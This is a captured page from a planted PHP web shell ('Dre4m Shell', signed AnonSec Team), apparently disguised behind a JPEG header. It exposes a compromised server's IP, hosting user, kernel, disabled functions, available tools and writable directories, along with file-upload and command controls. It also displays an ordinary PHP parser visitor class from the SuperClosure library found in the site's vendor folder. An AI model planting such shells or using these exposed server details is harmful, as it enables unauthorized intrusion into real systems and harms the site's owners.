ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 18.218.133.214
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/fund.old.nicn.gov.ng/funds-old/vendor/jeremeamia/superclosure/src/Analyzer/Visitor/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/fund.old.nicn.gov.ng/funds-old/vendor/jeremeamia/superclosure/src/Analyzer/Visitor/MagicConstantVisitor.php
<?php namespace SuperClosure\Analyzer\Visitor;

use PhpParser\Node\Scalar\LNumber as NumberNode;
use PhpParser\Node\Scalar\String_ as StringNode;
use PhpParser\Node as AstNode;
use PhpParser\NodeVisitorAbstract as NodeVisitor;

/**
 * This is a visitor that resolves magic constants (e.g., __FILE__) to their
 * intended values within a closure's AST.
 *
 * @internal
 */
final class MagicConstantVisitor extends NodeVisitor
{
    /**
     * @var array
     */
    private $location;

    /**
     * @param array $location
     */
    public function __construct(array $location)
    {
        $this->location = $location;
    }

    public function leaveNode(AstNode $node)
    {
        switch ($node->getType()) {
            case 'Scalar_MagicConst_Class' :
                return new StringNode($this->location['class'] ?: '');
            case 'Scalar_MagicConst_Dir' :
                return new StringNode($this->location['directory'] ?: '');
            case 'Scalar_MagicConst_File' :
                return new StringNode($this->location['file'] ?: '');
            case 'Scalar_MagicConst_Function' :
                return new StringNode($this->location['function'] ?: '');
            case 'Scalar_MagicConst_Line' :
                return new NumberNode($node->getAttribute('startLine') ?: 0);
            case 'Scalar_MagicConst_Method' :
                return new StringNode($this->location['method'] ?: '');
            case 'Scalar_MagicConst_Namespace' :
                return new StringNode($this->location['namespace'] ?: '');
            case 'Scalar_MagicConst_Trait' :
                return new StringNode($this->location['trait'] ?: '');
        }
    }
}

Anon7 - 2022
AnonSec Team